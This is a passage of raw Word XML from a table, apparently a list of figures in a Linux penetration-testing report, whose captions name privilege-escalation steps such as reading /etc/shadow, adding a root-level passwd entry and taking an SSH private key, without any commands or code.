      <w:tr w:rsidR="00582E80" w14:paraId="209497A7"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01ADDA69" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05A0AD50" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 8: Displaying Hidden .dot Files in the User Home Directory Using ls -la </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00258E44" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 15 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BCF73A7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="37B2A1A8"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7F8AB5A9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">11 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="076805FD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 9: Viewing the .bash_history File to Identify </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBA7C79" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Previously Executed Commands </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59460552" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 16 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E47130C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="2E117AAE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="848"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AF06BE4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">12 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5467FD11" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 11: Extracting a Specific User Password Hash from the /etc/shadow File </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34645CF4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 18 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="094EC613" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="3836F253"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6F9C2C64" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">13 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="555FE798" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 12: Comparing Normal File Permissions and SUID Permissions on Linux Binaries </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B44A861" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 19 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73FC7C3C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="481157CF"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2EFB1C9D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7285914B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 13: Creating a Password Hash for a New User Using OpenSSL </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0923D76C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 19 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F0BF060" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C627E3C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00582E80">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-1440" w:right="262" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9352" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="5" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="59" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="473"/>
        <w:gridCol w:w="5605"/>
        <w:gridCol w:w="1676"/>
        <w:gridCol w:w="1598"/>
      </w:tblGrid>
      <w:tr w:rsidR="00582E80" w14:paraId="0950EB07"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49919C10" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="721CEA9A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 14: Adding a New Root-Level User Entry to the Modified passwd File </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A60F926" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 20 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55431386" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="6C323673" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00551BE0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">16 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C1B19EB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Table 1: The seven components of an /etc/passwd entry </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16BE3965" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 20 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AACA492" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="059103CF"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5D5FC992" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EC4C02E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 15: Switching to the Pentest User and Verifying Root Privilege </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D0D6BE5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 21 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26F0F919" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="3F59E01F"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274BD9DE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">18 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23F1DFEF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 16: Extracting and Transferring the Stolen SSH Private Key </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="112895D7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 22 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D090D8E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="0FAB7EB3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="848"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
